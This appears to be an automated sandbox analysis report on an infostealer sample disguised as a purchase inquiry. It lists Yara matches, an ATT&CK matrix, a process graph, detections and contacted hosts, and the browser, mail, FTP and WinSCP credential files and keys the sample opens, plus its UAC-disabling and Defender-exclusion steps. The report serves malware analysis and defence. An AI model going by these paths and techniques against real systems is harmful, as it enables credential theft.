Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.AddIn\v4.0_4.0.0.0__b77a5c561934e089\System.AddIn.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\AppData\Roaming\svchost.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
                    Source: Amcache.hve.18.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.18.dr | Binary or memory string: msmpeng.exe
                    Source: Amcache.hve.18.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.18.dr | Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.00000000029C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000025.00000002.2880930308.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2877570286.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000030.00000002.2877901296.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8084, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7660, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jsc.exe PID: 8676, type: MEMORYSTR

                    MITRE ATT&CK Matrix (count badges precede the technique name in each cell)

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 1 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Shared Modules | 1 DLL Side-Loading | 411 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 531 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | 11 Registry Run Keys / Startup Folder | 11 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 151 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 411 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Hidden Files and Directories | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph
                    Behavior Graph ID: 1437973
                    Sample: RFQ678903423_PROD_INQUIRY_S...
                    Startdate: 08/05/2024
                    Architecture: WINDOWS
                    Score: 100
                    Start node: contacts smtp.zoho.eu, ip-api.com and 4 other IPs or domains; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 17 other signatures
                    - RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe (1 8), started
                        dropped: C:\Users\user\AppData\Roaming\svchost.exe, PE32+
                        signatures: Creates multiple autostart registry keys; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops PE files with benign system names
                        - cmd.exe (1), started
                            - svchost.exe (4), started
                                signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender; 2 other signatures
                                - MSBuild.exe, started
                                    network: smtp.zoho.eu 185.230.214.164, 49739, 49742, 49748, COMPUTERLINEComputerlineSchlierbachSwitzerlandCH, Netherlands
                                    signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier)
                                - powershell.exe, started
                                    signatures: Loading BitLocker PowerShell Module
                                    - conhost.exe, started
                                - jsc.exe, started
                                - 7 other processes
                            - conhost.exe, started
                            - timeout.exe (1), started
                        - cmd.exe (1), started
                            signatures: Uses schtasks.exe or at.exe to add and modify task schedules
                            - schtasks.exe (1), started
                            - conhost.exe, started
                        - conhost.exe, started
                    - svchost.exe (1 4), started
                        signatures: Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Allocates memory in foreign processes; Disables UAC (registry)
                        - InstallUtil.exe, started
                            network: ip-api.com 208.95.112.1, 49731, 49733, 49746, TUT-ASUS, United States; api.ipify.org 104.26.13.205, 443, 49730, 49732, CLOUDFLARENETUS, United States
                            dropped: C:\Users\user\AppData\...\vexplorers.exe, PE32
                            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures
                        - 4 other processes
                            - conhost.exe, started
                    - svchost.exe, started
                        signatures: Adds a directory exclusion to Windows Defender; Sample uses process hollowing technique; Injects a PE file into a foreign processes
                        - jsc.exe, started
                            signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier)
                        - 4 other processes
                            - conhost.exe, started
                    - 4 other processes
                        - AddInProcess32.exe, started
                        - 11 other processes
                            signatures: Loading BitLocker PowerShell Module
                            - conhost.exe, started

                    SourceDetectionScannerLabelLink
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe37%ReversingLabsByteCode-MSIL.Trojan.Nekark
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe25%VirustotalBrowse
                    RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost.exe37%ReversingLabsByteCode-MSIL.Trojan.Nekark
                    C:\Users\user\AppData\Roaming\svchost.exe36%VirustotalBrowse
                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe0%ReversingLabs
                    C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe0%VirustotalBrowse
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    bg.microsoft.map.fastly.net0%VirustotalBrowse
                    fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://status.thawte.com0:0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
smtp.zoho.eu | 185.230.214.164 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | unknown
api.ipify.org | 104.26.13.205 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.18.dr | false | | high
https://account.dyn.com/ | svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2868048682.0000000000438000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://api.ipify.org/t | InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F998000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0 | InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
